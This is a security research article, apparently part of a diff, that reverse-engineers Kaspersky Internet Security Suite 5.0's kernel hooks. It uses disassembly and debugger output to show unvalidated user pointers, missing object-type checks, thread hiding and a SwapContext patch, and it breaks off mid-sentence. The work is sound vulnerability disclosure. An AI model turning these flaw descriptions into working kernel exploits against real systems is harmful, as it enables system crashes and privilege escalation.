+ +This article discusses two personal security software packages that suffer from +problems that make it difficult to interoperate with the software, or even +compromise system security, all due to shortcuts and unsafe assumptions made by +the original developers. + +- Kaspersky Internet Security Suite 5.0 +- McAfee Internet Security Suite 2006 + +Both of these software packages include several personal security programs, +including firewall and anti-virus software. + + +2. The problem: Kaspersky Internet Security Suite 5.0 + +Kaspersky ships a personal security software suite known as Kaspersky Internet +Security Suite 5.0. This package includes various personal security software +programs, including a firewall and anti-virus software. + +Kaspersky's anti-virus software is the primarily focus of this article. Like +many other anti-virus software, Kaspersky Anti-Virus provides both manual and +real-time scanning capabilities. + +Kaspersky's anti-virus system (KAV) employs various unsafe techniques in its +kernel mode components, which may lead to a compromise of system security. + +2.1. Patching system services at runtime. + +Although KAV appears to use a filesystem filter, the standard Windows mechanism +for intercepting accesses to files (specifically designed for applications like +anti-virus software), the implementors also used a series of API-level function +hooks to intercept various file accesses. Performing function hooking in +kernel mode is a dangerous proposition; one must be very careful to fully +validate all parameters if a function could be called from user mode (otherwise +system security could be compromised by a malicious unprivileged program). +Additionally, it is generally not safe to remove code hooks in kernel mode as +it is difficult to prove that no threads will be running a particular code +region in order to unhook without risking bringing down the system. KAV also +hooks several other system services in a misguided attempt to "protect" its +processes from debuggers and process termination. + +Unfortunately, the KAV programmers did not properly validate parameters passed +to hooked system calls, opening holes that, at the very least, allow unprivileged +user mode programs to bring down the system, and may even allow local privilege +escalation (though the author has not spent the time necessary to prove whether +such is possible). + +KAV hooks the following system services (easily discoverable in WinDbg by +comparing nt!KeServiceDescriptorTableShadow on a system with KAV loaded with a +clean system: + + +kd> dps poi ( nt!KeServiceDescriptorTableShadow ) l dwo ( nt!KeServiceDescriptorTableShadow + 8 ) +8191c9c8 805862de nt!NtAcceptConnectPort +8191c9cc 8056fded nt!NtAccessCheck +. +. +. +8191ca2c f823fd00 klif!KavNtClose +. +. +. +8191ca84 f823fa20 klif!KavNtCreateProcess +8191ca88 f823fb90 klif!KavNtCreateProcessEx +8191ca8c 80647b59 nt!NtCreateProfile +8191ca90 f823fe40 klif!KavNtCreateSection +8191ca94 805747cf nt!NtCreateSemaphore +8191ca98 8059d4db nt!NtCreateSymbolicLinkObject +8191ca9c f8240630 klif!KavNtCreateThread +8191caa0 8059a849 nt!NtCreateTimer +. +. +. +8191cbb0 f823f7b0 klif!KavNtOpenProcess +. +. +. +8191cc24 f82402f0 klif!KavNtQueryInformationFile +. +. +. +8191cc7c f8240430 klif!KavNtQuerySystemInformation +. +. +. +8191cd00 f82405e0 klif!KavNtResumeThread +. +. +. +8191cd58 f82421f0 klif!KavNtSetInformationProcess +. +. +. +8191cdc0 f8240590 klif!KavNtSuspendThread +. +. +. 
+8191cdcc f82401c0 klif!KavNtTerminateProcess + + + +Additionally, KAV attempts to create several entirely new system services as a +shortcut for calling kernel mode by patching the service descriptor table. +This is certainly not the preferred mechanism to allow a user mode program to +communicate with a driver; the programmers should have used the conventional +IOCTL interface, which avoids the pitfalls of patching kernel structures at +runtime and having to deal with other inconveniences such as system service +ordinals changing from OS release to OS release. + +2.2. Improper validation of user mode pointers, assuming the size of the kernel + address space. + +Many of the hooks that KAV installs (and even the custom system services) +suffer from flaws that are detrimental to the operation of the system. + +For instance, KAV's modified NtOpenProcess attempts to determine if a user +address is valid by comparing it to the hardcoded value 0x7FFF0000. On most +x86 Windows systems, this address is below the highest user address (typically +0x7FFEFFFF). However, hardcoding the size of the kernel address space is not a +very good idea; there is a boot parameter `/3GB' that can be set in boot.ini in +order to change the default address space split of 2GB kernel and 2GB user to +1GB kernel and 3GB user. If a system with KAV is configured with /3GB, it is +expected that anything that calls NtOpenProcess (such as the win32 OpenProcess) +may randomly fail if parameter addresses are located above the first 2GB of the +user address space: + + .text:F82237B0 ; NTSTATUS __stdcall KavNtOpenProcess(PHANDLE ProcessHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PCLIENT_ID ClientId) + .text:F82237B0 KavNtOpenProcess proc near ; DATA XREF: sub_F82249D0+BFo + . + . + . + .text:F8223800 cmp eax, 7FFF0000h ; eax = ClientId + .text:F8223805 jbe short loc_F822380D + .text:F8223807 + .text:F8223807 loc_F8223807: ; CODE XREF: KavNtOpenProcess+4Ej + .text:F8223807 call ds:ExRaiseAccessViolation + + +The proper way to perform this validation would have been to use the documented +ProbeForRead function with a SEH frame, which will automatically raise an +access violation if the address is not a valid user address. + +Additionally, many of KAV's custom system services do not properly validate +user mode pointer arguments, which could be used to bring down the system: + + +.text:F8222BE0 ; int __stdcall KAVService10(int,PVOID OutputBuffer,int) +.text:F8222BE0 KAVService10 proc near ; DATA XREF: .data:F8227D14o +.text:F8222BE0 +.text:F8222BE0 arg_0 = dword ptr 4 +.text:F8222BE0 OutputBuffer = dword ptr 8 +.text:F8222BE0 arg_8 = dword ptr 0Ch +.text:F8222BE0 +.text:F8222BE0 mov edx, [esp+OutputBuffer] +.text:F8222BE4 push esi +.text:F8222BE5 mov esi, [esp+4+arg_8] +.text:F8222BE9 lea ecx, [esp+4+arg_8] +.text:F8222BED push ecx ; int +.text:F8222BEE mov eax, [esi] ; Unvalidated user mode pointer access +.text:F8222BF0 mov [esp+8+arg_8], eax +.text:F8222BF4 push eax ; OutputBufferLength +.text:F8222BF5 mov eax, [esp+0Ch+arg_0] +.text:F8222BF9 push edx ; OutputBuffer +.text:F8222BFA push eax ; int +.text:F8222BFB call sub_F821F9A0 ; This routine internally assumes that all pointer parameters given are valid. 
+.text:F8222C00 mov edx, [esi] +.text:F8222C02 mov ecx, [esp+4+arg_8] +.text:F8222C06 cmp ecx, edx +.text:F8222C08 jbe short loc_F8222C13 +.text:F8222C0A mov eax, 0C0000173h +.text:F8222C0F pop esi +.text:F8222C10 retn 0Ch +.text:F8222C13 ; --------------------------------------------------------------------------- +.text:F8222C13 +.text:F8222C13 loc_F8222C13: ; CODE XREF: KAVService10+28j +.text:F8222C13 mov [esi], ecx +.text:F8222C15 pop esi +.text:F8222C16 retn 0Ch +.text:F8222C16 KAVService10 endp + + +.text:F8222C20 KAVService11 proc near ; DATA XREF: .data:F8227D18o +.text:F8222C20 +.text:F8222C20 arg_0 = dword ptr 4 +.text:F8222C20 arg_4 = dword ptr 8 +.text:F8222C20 arg_8 = dword ptr 0Ch +.text:F8222C20 +.text:F8222C20 mov edx, [esp+arg_4] +.text:F8222C24 push esi +.text:F8222C25 mov esi, [esp+4+arg_8] +.text:F8222C29 lea ecx, [esp+4+arg_8] +.text:F8222C2D push ecx +.text:F8222C2E mov eax, [esi] ; Unvalidated user mode pointer access +.text:F8222C30 mov [esp+8+arg_8], eax +.text:F8222C34 push eax +.text:F8222C35 mov eax, [esp+0Ch+arg_0] +.text:F8222C39 push edx +.text:F8222C3A push eax +.text:F8222C3B call sub_F8214CE0 ; This routine internally assumes that all pointer parameters given are valid. +.text:F8222C40 test eax, eax +.text:F8222C42 jnz short loc_F8222C59 +.text:F8222C44 mov ecx, [esp+4+arg_8] +.text:F8222C48 mov edx, [esi] +.text:F8222C4A cmp ecx, edx +.text:F8222C4C jbe short loc_F8222C57 +.text:F8222C4E mov eax, STATUS_INVALID_BLOCK_LENGTH +.text:F8222C53 pop esi +.text:F8222C54 retn 0Ch +.text:F8222C57 ; --------------------------------------------------------------------------- +.text:F8222C57 +.text:F8222C57 loc_F8222C57: ; CODE XREF: KAVService11+2Cj +.text:F8222C57 mov [esi], ecx +.text:F8222C59 +.text:F8222C59 loc_F8222C59: ; CODE XREF: KAVService11+22j +.text:F8222C59 pop esi +.text:F8222C5A retn 0Ch +.text:F8222C5A KAVService11 endp + + +2.3. Improper validation of user mode structures and pointers, hiding threads + from user mode. + +KAV's errors with hooking do not end with NtOpenProcess, however. One of the +system services KAV hooks is NtQuerySystemInformation, which is modified to +sometimes truncate a thread listing from certain processes when the +SystemProcessesAndThreads information class is requested. This is the +underlying mechanism for user mode to receive a process and thread listing of +all programs running in the system, and in effect provides a means for KAV to +hide threads from user mode. The very fact that this code exists at all in KAV +is curious; hiding running code from user mode is typically something that is +associated with rootkits and not anti-virus software. + +Besides the potentially abusive behavior of hiding running code, this hook +contains several security flaws: + +1. It uses the user mode output buffer from NtQuerySystemInformation after it + has been filled by the actual kernel implementation, but it does not guard + against a malicious user mode program modifying this buffer or even freeing + it. There is no SEH frame wrapping this function, so a user mode program + could cause KAV to touch freed memory. + +2. There is no validation of offsets within the returned output buffer to + ensure that offsets do not refer to memory outside of the output buffer. + This is problematic, because the returned data structure is actually a list + of sub-structures that must be walked by adding an offset supplied as part + of a particular substructure to the address of that substructure in order to + reach the next substructure. 
Such an offset could be modified by user mode + to actually point into kernel memory. Because the hook then sometimes + writes data into what it believes is the user mode output buffer, this is an + interesting avenue to explore for gaining kernel privileges from an + unprivileged user mode function. + +.text:F8224430 ; NTSTATUS __stdcall KavNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength) +.text:F8224430 KavNtQuerySystemInformation proc near ; DATA XREF: sub_F82249D0+17Bo +.text:F8224430 +.text:F8224430 var_10 = dword ptr -10h +.text:F8224430 var_C = dword ptr -0Ch +.text:F8224430 var_8 = dword ptr -8 +.text:F8224430 SystemInformationClass= dword ptr 4 +.text:F8224430 SystemInformation= dword ptr 8 +.text:F8224430 SystemInformationLength= dword ptr 0Ch +.text:F8224430 ReturnLength = dword ptr 10h +.text:F8224430 arg_24 = dword ptr 28h +.text:F8224430 +.text:F8224430 mov eax, [esp+ReturnLength] +.text:F8224434 mov ecx, [esp+SystemInformationLength] +.text:F8224438 mov edx, [esp+SystemInformation] +.text:F822443C push ebx +.text:F822443D push ebp +.text:F822443E push esi +.text:F822443F mov esi, [esp+0Ch+SystemInformationClass] +.text:F8224443 push edi +.text:F8224444 push eax +.text:F8224445 push ecx +.text:F8224446 push edx +.text:F8224447 push esi +.text:F8224448 call OrigNtQuerySystemInformation +.text:F822444E mov edi, eax +.text:F8224450 cmp esi, SystemProcessesAndThreadsInformation ; +.text:F8224450 ; Not the process / thread list API? +.text:F8224450 ; Return to caller +.text:F8224453 mov [esp+10h+ReturnLength], edi +.text:F8224457 jnz ret_KavNtQuerySystemInformation +.text:F822445D xor ebx, ebx +.text:F822445F cmp edi, ebx ; +.text:F822445F ; Nothing returned? +.text:F822445F ; Return to caller +.text:F8224461 jl ret_KavNtQuerySystemInformation +.text:F8224467 push ebx +.text:F8224468 push 9 +.text:F822446A push 8 +.text:F822446C call sub_F8216730 +.text:F8224471 test al, al +.text:F8224473 jz ret_KavNtQuerySystemInformation +.text:F8224479 mov ebp, g_KavDriverData +.text:F822447F mov ecx, [ebp+0Ch] +.text:F8224482 lea edx, [ebp+48h] +.text:F8224485 inc ecx +.text:F8224486 mov [ebp+0Ch], ecx +.text:F8224489 mov ecx, ebp +.text:F822448B call ds:ExInterlockedPopEntrySList +.text:F8224491 mov esi, eax +.text:F8224493 cmp esi, ebx +.text:F8224495 jnz short loc_F82244B7 +.text:F8224497 mov eax, [ebp+10h] +.text:F822449A mov ecx, [ebp+24h] +.text:F822449D mov edx, [ebp+1Ch] +.text:F82244A0 inc eax +.text:F82244A1 mov [ebp+10h], eax +.text:F82244A4 mov eax, [ebp+20h] +.text:F82244A7 push eax +.text:F82244A8 push ecx +.text:F82244A9 push edx +.text:F82244AA call [ebp+arg_24] +.text:F82244AD mov esi, eax +.text:F82244AF cmp esi, ebx +.text:F82244B1 jz ret_KavNtQuerySystemInformation +.text:F82244B7 +.text:F82244B7 loc_F82244B7: ; CODE XREF: KavNtQuerySystemInformation+65j +.text:F82244B7 mov edi, [esp+10h+SystemInformation] +.text:F82244BB mov dword ptr [esi], 8 +.text:F82244C1 mov dword ptr [esi+4], 9 +.text:F82244C8 mov [esi+8], ebx +.text:F82244CB mov [esi+34h], ebx +.text:F82244CE mov dword ptr [esi+3Ch], 1 +.text:F82244D5 mov [esi+10h], bl +.text:F82244D8 mov [esi+30h], ebx +.text:F82244DB mov [esi+0Ch], ebx +.text:F82244DE mov [esi+38h], ebx +.text:F82244E1 mov ebp, 13h +.text:F82244E6 +.text:F82244E6 LoopThreadProcesses: ; CODE XREF: KavNtQuerySystemInformation+ECj +.text:F82244E6 mov dword ptr [esi+40h], 4 ; +.text:F82244E6 ; Loop through the returned list of processes and threads. 
+.text:F82244E6 ; For each process, we shall check to see if it is a +.text:F82244E6 ; special (protected) process. If so, then we might +.text:F82244E6 ; decide to remove its threads from the listing returned +.text:F82244E6 ; by setting the thread count to zero. +.text:F82244ED mov [esi+48h], ebx +.text:F82244F0 mov [esi+44h], ebp +.text:F82244F3 mov eax, [edi+SYSTEM_PROCESSES.ProcessId] +.text:F82244F6 push ebx +.text:F82244F7 push esi +.text:F82244F8 mov [esi+4Ch], eax +.text:F82244FB call KavCheckProcess +.text:F8224500 cmp eax, 7 +.text:F8224503 jz short CheckNextThreadProcess +.text:F8224505 cmp eax, 1 +.text:F8224508 jz short CheckNextThreadProcess +.text:F822450A cmp eax, ebx +.text:F822450C jz short CheckNextThreadProcess +.text:F822450E mov [edi+SYSTEM_PROCESSES.ThreadCount], ebx ; Zero thread count out (hide process threads) +.text:F8224511 +.text:F8224511 CheckNextThreadProcess: ; CODE XREF: KavNtQuerySystemInformation+D3j +.text:F8224511 ; KavNtQuerySystemInformation+D8j ... +.text:F8224511 mov eax, [edi+SYSTEM_PROCESSES.NextEntryDelta] +.text:F8224513 cmp eax, ebx +.text:F8224515 setz cl +.text:F8224518 add edi, eax +.text:F822451A cmp cl, bl +.text:F822451C jz short LoopThreadProcesses + + +2.4. Improper validation of kernel object types. + +Windows exposes many kernel features through a series of "kernel objects", +which may be acted upon by user mode through the user of handles. Handles are +integral values that are translated by the kernel into pointers to a particular +object upon which something (typically a system service) interacts with on +behalf of a caller. All objects share the same handle namespace. + +Because of this handle namespace sharing between objects of different types, +one of the jobs of a system service inspecting a handle is to verify that the +object that it refers to is of the expected type. This is accomplished by an +object manager routine ObReferenceObjectByHandle, which performs the +translation of handles to object pointers and does an optional built-in type +check by comparing a type field in the standard object header to a passed in +type. + +Since KAV hooks system services, in inevitably must deal with kernel handles. +Unfortunately, it does not do so correctly. In some cases, it does not ensure +that a handle refers to an object of a particular type before using the object +pointer, which will result in corruption or a system crash if a handle of the +wrong type is passed to a system service. + +One such case is the KAV NtResumeThread hook, which attempts to track the state +of running threads in the system. In this particular case, it does not seem +possible for user mode to crash the system by passing an object of the wrong +type as the returned object pointer, because it is simply used as a key in a +lookup table that is prepopulated with thread object pointers. KAV also hooks +NtSuspendThread for similar purposes, and this hook has the same problem with +the validation of object handle types. + + +.text:F82245E0 ; NTSTATUS __stdcall KavNtResumeThread(HANDLE ThreadHandle,PULONG PreviousSuspendCount) +.text:F82245E0 KavNtResumeThread proc near ; DATA XREF: sub_F82249D0+FBo +.text:F82245E0 +.text:F82245E0 ThreadHandle = dword ptr 8 +.text:F82245E0 PreviousSuspendCount= dword ptr 0Ch +.text:F82245E0 +.text:F82245E0 push esi +.text:F82245E1 mov esi, [esp+ThreadHandle] +.text:F82245E5 test esi, esi +.text:F82245E7 jz short loc_F8224620 +.text:F82245E9 lea eax, [esp+ThreadHandle] ; +.text:F82245E9 ; This should pass an object type here! 
+.text:F82245ED push 0 ; HandleInformation +.text:F82245EF push eax ; Object +.text:F82245F0 push 0 ; AccessMode +.text:F82245F2 push 0 ; ObjectType +.text:F82245F4 push 0F0000h ; DesiredAccess +.text:F82245F9 push esi ; Handle +.text:F82245FA mov [esp+18h+ThreadHandle], 0 +.text:F8224602 call ds:ObReferenceObjectByHandle +.text:F8224608 test eax, eax +.text:F822460A jl short loc_F8224620 +.text:F822460C mov ecx, [esp+ThreadHandle] +.text:F8224610 push ecx +.text:F8224611 call KavUpdateThreadRunningState +.text:F8224616 mov ecx, [esp+ThreadHandle] ; Object +.text:F822461A call ds:ObfDereferenceObject +.text:F8224620 +.text:F8224620 loc_F8224620: ; CODE XREF: KavNtResumeThread+7j +.text:F8224620 ; KavNtResumeThread+2Aj +.text:F8224620 mov edx, [esp+PreviousSuspendCount] +.text:F8224624 push edx +.text:F8224625 push esi +.text:F8224626 call OrigNtResumeThread +.text:F822462C pop esi +.text:F822462D retn 8 +.text:F822462D KavNtResumeThread endp +.text:F822462D + + +.text:F8224590 ; NTSTATUS __stdcall KavNtSuspendThread(HANDLE ThreadHandle,PULONG PreviousSuspendCount) +.text:F8224590 sub_F8224590 proc near ; DATA XREF: sub_F82249D0+113o +.text:F8224590 +.text:F8224590 ThreadHandle = dword ptr 8 +.text:F8224590 PreviousSuspendCount= dword ptr 0Ch +.text:F8224590 +.text:F8224590 push esi +.text:F8224591 mov esi, [esp+ThreadHandle] +.text:F8224595 test esi, esi +.text:F8224597 jz short loc_F82245D0 +.text:F8224599 lea eax, [esp+ThreadHandle] ; +.text:F8224599 ; This should pass an object type here! +.text:F822459D push 0 ; HandleInformation +.text:F822459F push eax ; Object +.text:F82245A0 push 0 ; AccessMode +.text:F82245A2 push 0 ; ObjectType +.text:F82245A4 push 0F0000h ; DesiredAccess +.text:F82245A9 push esi ; Handle +.text:F82245AA mov [esp+18h+ThreadHandle], 0 +.text:F82245B2 call ds:ObReferenceObjectByHandle +.text:F82245B8 test eax, eax +.text:F82245BA jl short loc_F82245D0 +.text:F82245BC mov ecx, [esp+ThreadHandle] +.text:F82245C0 push ecx +.text:F82245C1 call KavUpdateThreadSuspendedState +.text:F82245C6 mov ecx, [esp+ThreadHandle] ; Object +.text:F82245CA call ds:ObfDereferenceObject +.text:F82245D0 +.text:F82245D0 loc_F82245D0: ; CODE XREF: sub_F8224590+7j +.text:F82245D0 ; sub_F8224590+2Aj +.text:F82245D0 mov edx, [esp+PreviousSuspendCount] +.text:F82245D4 push edx +.text:F82245D5 push esi +.text:F82245D6 call OrigNtSuspendThread +.text:F82245DC pop esi +.text:F82245DD retn 8 +.text:F82245DD sub_F8224590 endp +.text:F82245DD + + +Not all of KAV's hooks are so fortunate, however. The NtTerminateProcess hook +that KAV installs looks into the body of the object referred to by the process +handle parameter of the function in order to determine the name of the process +being terminated. However, KAV fails to validate that the object handle given +by user mode really refers to a process object. + +This is unsafe for several reasons, which may be well known to the reader if +one is experienced with Windows kernel programming. + +1. The kernel process structure definition (EPROCESS) changes frequently from + OS release to OS release, and even between service packs. As a result, it + is not generally safe to access this structure directly. + +2. Because KAV does not perform proper type checking, it is possible to pass an + object handle to a different kernel object - say, a mutex - which may cause + KAV to bring down the system because the internal object structures of a + mutex (or any other kernel object) are not compatible with that of a process + object. 
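+
+As a point of contrast with the hook behavior described above, the
+type-checked referencing pattern is essentially a one-argument change.  The
+sketch below is not KAV's code; the helper name is hypothetical, and it
+assumes, as with the NtTerminateProcess hook just discussed, that the
+incoming handle is supposed to refer to a process object.
+
+#include <ntddk.h>
+
+//
+// Hypothetical helper: resolve a process handle received as a system
+// service parameter.  Supplying *PsProcessType causes the object manager to
+// fail the call with STATUS_OBJECT_TYPE_MISMATCH if the handle refers to
+// any other object type, and using the caller's previous mode enforces the
+// handle's granted-access check for user mode callers.
+//
+NTSTATUS
+SafeReferenceProcessHandle(
+    IN HANDLE ProcessHandle,
+    IN ACCESS_MASK DesiredAccess,
+    OUT PEPROCESS *Process
+    )
+{
+    return ObReferenceObjectByHandle(ProcessHandle,
+                                     DesiredAccess,
+                                     *PsProcessType,
+                                     ExGetPreviousMode(),
+                                     (PVOID *)Process,
+                                     NULL);
+}
+
+A successful reference must still be released with ObDereferenceObject, just
+as the hooks shown here do; the only difference is that a handle of the
+wrong type is rejected before the object body is ever touched.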
+ +KAV attempts to work around the first problem by attempting to discover the +offset of the member in the EPROCESS structure that contains the process name +at runtime. The algorithm used is to scan forward one byte at a time from the +start of the process object pointer until a sequence of bytes identifying the +name of the initial system process is discovered. (This routine is called in +the context of the initial system process). + + +.text:F82209E0 KavFindEprocessNameOffset proc near ; CODE XREF: sub_F8217A60+FCp +.text:F82209E0 push ebx +.text:F82209E1 push esi +.text:F82209E2 push edi +.text:F82209E3 call ds:IoGetCurrentProcess +.text:F82209E9 mov edi, ds:strncmp +.text:F82209EF mov ebx, eax +.text:F82209F1 xor esi, esi +.text:F82209F3 +.text:F82209F3 loc_F82209F3: ; CODE XREF: KavFindEprocessNameOffset+2Ej +.text:F82209F3 lea eax, [esi+ebx] +.text:F82209F6 push 6 ; size_t +.text:F82209F8 push eax ; char * +.text:F82209F9 push offset aSystem ; "System" +.text:F82209FE call edi ; strncmp +.text:F8220A00 add esp, 0Ch +.text:F8220A03 test eax, eax +.text:F8220A05 jz short loc_F8220A16 +.text:F8220A07 inc esi +.text:F8220A08 cmp esi, 3000h +.text:F8220A0E jl short loc_F82209F3 +.text:F8220A10 pop edi +.text:F8220A11 pop esi +.text:F8220A12 xor eax, eax +.text:F8220A14 pop ebx +.text:F8220A15 retn +.text:F8220A16 ; --------------------------------------------------------------------------- +.text:F8220A16 +.text:F8220A16 loc_F8220A16: ; CODE XREF: KavFindEprocessNameOffset+25j +.text:F8220A16 mov eax, esi +.text:F8220A18 pop edi +.text:F8220A19 pop esi +.text:F8220A1A pop ebx +.text:F8220A1B retn +.text:F8220A1B KavFindEprocessNameOffset endp + +.text:F8217B5C call KavFindEprocessNameOffset +.text:F8217B61 mov g_EprocessNameOffset, eax + + +Given a handle to an object of the wrong type, KAV will read from the returned +object body pointer in an attempt to determine the name of the process being +destroyed. This will typically run off the end of the structure for an object +that is not a process object (the Process object is very large compared to some +objects, such as a Mutex object, and the offset of the process name within this +structure is typically several hundred bytes or more). It is expected that +this will cause the system to crash if a bad handle is passed to +NtTerminateProcess. + + +.text:F82241C0 ; NTSTATUS __stdcall KavNtTerminateProcess(HANDLE ThreadHandle,NTSTATUS ExitStatus) +.text:F82241C0 KavNtTerminateProcess proc near ; DATA XREF: sub_F82249D0+ABo +.text:F82241C0 +.text:F82241C0 var_58 = dword ptr -58h +.text:F82241C0 ProcessObject = dword ptr -54h +.text:F82241C0 ProcessData = KAV_TERMINATE_PROCESS_DATA ptr -50h +.text:F82241C0 var_4 = dword ptr -4 +.text:F82241C0 ProcessHandle = dword ptr 4 +.text:F82241C0 ExitStatus = dword ptr 8 +.text:F82241C0 +.text:F82241C0 sub esp, 54h +.text:F82241C3 push ebx +.text:F82241C4 xor ebx, ebx +.text:F82241C6 push esi +.text:F82241C7 mov [esp+5Ch+ProcessObject], ebx +.text:F82241CB call KeGetCurrentIrql +.text:F82241D0 mov esi, [esp+5Ch+ProcessHandle] +.text:F82241D4 cmp al, 2 ; +.text:F82241D4 ; IRQL >= DISPATCH_LEVEL? Abort +.text:F82241D4 ; ( This is impossible for a system service ) +.text:F82241D6 jnb Ret_KavNtTerminateProcess +.text:F82241DC cmp esi, ebx ; +.text:F82241DC ; Null process handle? 
Abort +.text:F82241DE jz Ret_KavNtTerminateProcess +.text:F82241E4 call PsGetCurrentProcessId +.text:F82241E9 mov [esp+5Ch+ProcessData.CurrentProcessId], eax +.text:F82241ED xor eax, eax +.text:F82241EF cmp esi, 0FFFFFFFFh +.text:F82241F2 push esi ; ProcessHandle +.text:F82241F3 setnz al +.text:F82241F6 dec eax +.text:F82241F7 mov [esp+60h+ProcessData.TargetIsCurrentProcess], eax +.text:F82241FB call KavGetProcessIdFromProcessHandle +.text:F8224200 lea ecx, [esp+5Ch+ProcessObject] ; Object +.text:F8224204 push ebx ; HandleInformation +.text:F8224205 push ecx ; Object +.text:F8224206 push ebx ; AccessMode +.text:F8224207 push ebx ; ObjectType +.text:F8224208 push 0F0000h ; DesiredAccess +.text:F822420D push esi ; Handle +.text:F822420E mov [esp+74h+ProcessData.TargetProcessId], eax +.text:F8224212 mov [esp+74h+var_4], ebx +.text:F8224216 call ds:ObReferenceObjectByHandle +.text:F822421C test eax, eax +.text:F822421E jl short loc_F8224246 +.text:F8224220 mov edx, [esp+5Ch+ProcessObject] +.text:F8224224 mov eax, g_EprocessNameOffset +.text:F8224229 add eax, edx +.text:F822422B push 40h ; size_t +.text:F822422D lea ecx, [esp+60h+ProcessData.ProcessName] +.text:F8224231 push eax ; char * +.text:F8224232 push ecx ; char * +.text:F8224233 call ds:strncpy +.text:F8224239 mov ecx, [esp+68h+ProcessObject] +.text:F822423D add esp, 0Ch +.text:F8224240 call ds:ObfDereferenceObject +.text:F8224246 +.text:F8224246 loc_F8224246: ; CODE XREF: KavNtTerminateProcess+5Ej +.text:F8224246 cmp esi, 0FFFFFFFFh +.text:F8224249 jnz short loc_F8224255 +.text:F822424B mov edx, [esp+5Ch+ProcessData.TargetProcessId] +.text:F822424F push edx +.text:F8224250 call sub_F8226710 +.text:F8224255 +.text:F8224255 loc_F8224255: ; CODE XREF: KavNtTerminateProcess+89j +.text:F8224255 lea eax, [esp+5Ch+ProcessData] +.text:F8224259 push ebx ; int +.text:F822425A push eax ; ProcessData +.text:F822425B call KavCheckTerminateProcess +.text:F8224260 cmp eax, 7 +.text:F8224263 jz short loc_F822427D +.text:F8224265 cmp eax, 1 +.text:F8224268 jz short loc_F822427D +.text:F822426A cmp eax, ebx +.text:F822426C jz short loc_F822427D +.text:F822426E mov esi, STATUS_ACCESS_DENIED +.text:F8224273 mov eax, esi +.text:F8224275 pop esi +.text:F8224276 pop ebx +.text:F8224277 add esp, 54h +.text:F822427A retn 8 +.text:F822427D ; --------------------------------------------------------------------------- +.text:F822427D +.text:F822427D loc_F822427D: ; CODE XREF: KavNtTerminateProcess+A3j +.text:F822427D ; KavNtTerminateProcess+A8j ... 
+.text:F822427D mov eax, [esp+5Ch+ProcessData.TargetProcessId] +.text:F8224281 cmp eax, 1000h +.text:F8224286 jnb short loc_F8224296 +.text:F8224288 mov dword_F8228460[eax*8], ebx +.text:F822428F mov byte_F8228464[eax*8], bl +.text:F8224296 +.text:F8224296 loc_F8224296: ; CODE XREF: KavNtTerminateProcess+C6j +.text:F8224296 push eax +.text:F8224297 call sub_F82134D0 +.text:F822429C mov ecx, [esp+5Ch+ProcessData.TargetProcessId] +.text:F82242A0 push ecx +.text:F82242A1 call sub_F8221F70 +.text:F82242A6 mov edx, [esp+5Ch+ExitStatus] +.text:F82242AA push edx +.text:F82242AB push esi +.text:F82242AC call OrigNtTerminateProcess +.text:F82242B2 mov esi, eax +.text:F82242B4 lea eax, [esp+5Ch+ProcessData] +.text:F82242B8 push 1 ; int +.text:F82242BA push eax ; ProcessData +.text:F82242BB mov [esp+64h+var_4], esi +.text:F82242BF call KavCheckTerminateProcess +.text:F82242C4 mov eax, esi +.text:F82242C6 pop esi +.text:F82242C7 pop ebx +.text:F82242C8 add esp, 54h +.text:F82242CB retn 8 +.text:F82242CE ; --------------------------------------------------------------------------- +.text:F82242CE +.text:F82242CE Ret_KavNtTerminateProcess: ; CODE XREF: KavNtTerminateProcess+16j +.text:F82242CE ; KavNtTerminateProcess+1Ej +.text:F82242CE mov ecx, [esp+5Ch+ExitStatus] +.text:F82242D2 push ecx +.text:F82242D3 push esi +.text:F82242D4 call OrigNtTerminateProcess +.text:F82242DA pop esi +.text:F82242DB pop ebx +.text:F82242DC add esp, 54h +.text:F82242DF retn 8 +.text:F82242DF KavNtTerminateProcess endp + + +The whole purpose of this particular system service hook is "shady" as well. +The hook prevents certain KAV processes from being terminated, even by a +legitimate computer administrator - something that is once again typically +associated with malicious software such as rootkits rather than commercial +software applications. One possible explanation is to attempt to prevent +viruses from terminating the virus scanner processes itself, although one +wonders how much of a concern this would be if KAV's real-time scanning +mechanisms really do work as advertised. + +Additionally, KAV appears to do some state tracking just before the process is +terminated with this system service hook. The proper way to do this would have +been through PsSetCreateProcessNotifyRoutine, a documented kernel function that +allows drivers to register a callback that is called on process creation and +process exit. + + +2.5. Patching non-exported, non-system-service kernel functions. + +KAV's kernel patching is not limited to just system services, however. One of +the most dangerous hooks that KAV installs is one in the middle of the +nt!SwapContext function, which is neither exported nor a system service (and +thus has reliable mechanism to be detected by driver code, other than code +fingerprinting). nt!SwapContext is called by the kernel on every context +switch in order to perform some internal bookkeeping tasks. + +Patching such a critical, non-exported kernel function with a mechanism as +unreliable as blind code fingerprinting is, in the author's opinion, not a +particularly good idea. To make matters worse, KAV actually modifies code in +the middle of nt!SwapContext instead of patching the start of the function, and +as such makes assumptions about the internal register and stack usage of this +kernel function. 
+ + + kd> u nt!SwapContext + nt!SwapContext: + 804db924 0ac9 or cl,cl + 804db926 26c6462d02 mov byte ptr es:[esi+0x2d],0x2 + 804db92b 9c pushfd + 804db92c 8b0b mov ecx,[ebx] + 804db92e e9dd69d677 jmp klif!KavSwapContext (f8242310) + + +The unmodified nt!SwapContext has code that runs along the lines of this: + + + lkd> u nt!SwapContext + nt!SwapContext: + 80540ab0 0ac9 or cl,cl + 80540ab2 26c6462d02 mov byte ptr es:[esi+0x2d],0x2 + 80540ab7 9c pushfd + 80540ab8 8b0b mov ecx,[ebx] + 80540aba 83bb9409000000 cmp dword ptr [ebx+0x994],0x0 + 80540ac1 51 push ecx + 80540ac2 0f8535010000 jne nt!SwapContext+0x14d (80540bfd) + 80540ac8 833d0ca0558000 cmp dword ptr [nt!PPerfGlobalGroupMask (8055a00c)],0x0 + + +This is an extremely dangerous patching operation to make, for several reasons: + +1. nt!SwapContext is a *very* hot code path, as it is called on every single + context switch. Therefore, patching it at runtime without running a non-trivial + risk of bringing down the system is very difficult, especially on + multiprocessor systems. KAV attempts to solve the synchronization problems + relating to patching this function on uniprocessor systems by disabling + interrupts entirely, but this approach will not work reliably on + multiprocessor systems. KAV makes no attempt to address this problem on + multiprocessor systems and puts them at the risk of randomly failing on boot + during KAV's patching. + +2. Reliably locating this function and making assumptions about the register + and stack usage (and instruction layout) across all released and future + Windows versions is a practical impossibility, and yet KAV attempts to do + just this. This puts 